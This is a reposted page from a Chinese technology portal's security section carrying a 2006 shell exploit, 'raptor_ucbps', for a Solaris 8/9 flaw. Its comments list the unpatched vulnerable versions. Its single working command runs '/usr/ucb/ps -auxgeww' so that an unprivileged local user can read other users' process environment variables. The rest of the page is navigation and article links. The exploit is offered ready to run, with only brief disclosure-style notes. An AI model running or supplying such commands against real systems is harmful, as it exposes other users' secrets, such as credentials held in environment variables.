首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 安全知识 > Solaris 8 / 9 (/usr/ucb/ps) Local Information
【标  题】:Solaris 8 / 9 (/usr/ucb/ps) Local Information
【关键字】:Solaris,/usr/ucb/ps,Local,Information
【来  源】:http://www.cublog.cn/u/2056/showart.php?id=159290

Solaris 8 / 9 (/usr/ucb/ps) Local Information

Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit
 
#!/bin/sh

#
# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $
#
# raptor_ucbps - information leak with Solaris /usr/ucb/ps
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow 
# unprivileged local users the ability to see environment variables and their 
# values for processes which belong to other users (Sun Alert ID: 102215).
#
# Absolutely nothing fancy, but it may turn out to be useful;)
#
# Usage:
# $ chmod +x raptor_ucbps
# $ ./raptor_ucbps
# [...]
#
# Vulnerable platforms (SPARC):
# Solaris 8 without patch 109023-05 [tested]
# Solaris 9 without patch 120240-01 [tested]
#
# Vulnerable platforms (x86):
# Solaris 8 without patch 109024-05 [untested]
# Solaris 9 without patch 120239-01 [untested]
#

echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

/usr/ucb/ps -auxgeww

Mozilla Firefox <= 1.5.0.6 (FTP Request):【上一篇】
MDaemon POP3 Server < 9.06 (USER) Remote Buffer:【下一篇】
【相关文章】
  • Booting Problems in Solaris
  • Solaris 扩容
  • solaris系统panics故障实例与解决方法 (作者:大海剑侠)
  • Solaris8下用ip_filter做全接管
  • Solaris ACL (Solaris 访问控制列表)
  • Solaris上的crontab使用
  • solaris metadb 之 "i" 选项
  • 几则关于glibc的locale的笔记
  • AIX,HPUX,Tru64,Solaris,Linux 命令比较(2006-8-18更新)
  • Solaris下apache编译问题
  • 【随机文章】
  • 关于Daily Build的一些掌故
  • 苹果中国2007年技术研讨会 - Leopard Tech Talk Confirmation
  • oracle在线备份原理
  • 神奇的图片
  • 使用EasyMock扩展为Class提供Mock对象
  • 探索C++的秘密之详解extern “C”
  • 就是水波一层层展开 那个东西
  • man的内容存成文本文件
  • 一个基于Mule的企业服务总线的案例
  • 初来咋道,请多关照
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 软讯网络 All Rigths Reserved.